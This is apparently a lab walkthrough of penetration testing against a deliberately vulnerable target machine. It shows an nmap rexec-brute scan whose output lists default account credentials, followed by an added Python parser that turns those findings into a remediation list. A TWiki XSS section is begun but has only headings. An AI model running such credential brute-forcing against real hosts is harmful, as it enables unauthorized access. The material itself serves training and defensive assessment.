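Penetration Testing Target Machine Walkthrough --- 01
Preparation before the penetration test:
1. Set up the target machine (many ready-made ones can be found online; the setup process is skipped here)
2. Scan the target machine with OpenVAS to produce a vulnerability report
1. For the OpenVAS setup steps, see: https://blog.51cto.com/linhong/2134910?source=drh
2. Report location: https://download.csdn.net/download/m0_37268841/11855947
3. Vulnerability details:
Penetration testing in practice: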
1. rexec Passwordless / Unencrypted Cleartext Login
root@kali:~# nmap -p 512 --script rexec-brute *.*.*.* (here input the ipaddress)
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-12 13:39 CST
Nmap scan report for 192.168.10.149
Host is up (0.081s latency).
PORT STATE SERVICE
512/tcp open exec
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| netadmin:netadmin - Valid credentials
| user:user - Valid credentials
| guest:guest - Valid credentials
| web:12345 - Valid credentials
| webadmin:webadmin - Valid credentials
| administrator:administrator - Valid credentials
| sysadmin:sysadmin - Valid credentials
| admin:admin - Valid credentials
| test:test - Valid credentials
|_ Statistics: Performed 26 guesses in 1 seconds, average tps: 26.0
Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds
root@kali:~#
As you can see, this vulnerability allows both the usernames and the passwords to be brute-forced.
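Added example (not part of the original post): a small Python parser that turns the rexec-brute output above into a remediation list for the report, flagging accounts whose password equals the username and ranking privileged accounts first without copying any password. The sample text is an abbreviated, constructed copy of the output above, and the PRIVILEGED set is an assumption.

```python
import re

# Constructed sample: abbreviated copy of the rexec-brute output shown above.
SAMPLE = """\
512/tcp open exec
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| web:12345 - Valid credentials
| admin:admin - Valid credentials
|_ Statistics: Performed 26 guesses in 1 seconds, average tps: 26.0
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+\S+")
CRED_RE = re.compile(r"^\|[ _]*(?P<user>[^:\s]+):(?P<pw>.*?) - Valid credentials$")
PRIVILEGED = {"root", "administrator", "admin", "sysadmin"}  # assumption: adjust per site


def parse_findings(text):
    """Return one finding per valid credential reported by an NSE brute script."""
    findings, port = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port = f"{m.group(1)}/{m.group(2)}"
            continue
        m = CRED_RE.match(line)
        if not m:
            continue
        user, pw = m.group("user"), m.group("pw")
        reasons = []
        if pw.lower() == user.lower():
            reasons.append("password equals username")
        if pw.isdigit() and len(pw) < 8:
            reasons.append("short numeric password")
        severity = "critical" if user.lower() in PRIVILEGED else "high"
        # Record why the password is weak, never the password itself.
        findings.append(dict(port=port, user=user, severity=severity, reasons=reasons))
    return findings


def summarize(findings):
    """Order findings so privileged accounts are remediated first."""
    return sorted(findings, key=lambda f: (f["severity"] != "critical", f["user"]))


if __name__ == "__main__":
    for f in summarize(parse_findings(SAMPLE)):
        print(f["port"], f["severity"], f["user"], "; ".join(f["reasons"]))
```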
2. TWiki XSS and Command Execution Vulnerabilities (Port: 80)
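1. This high-severity vulnerability is an application-layer vulnerability, a flaw in the web pages
2. Here you can run a scan targeted at TWiki:
3. Exploiting the XSS vulnerability: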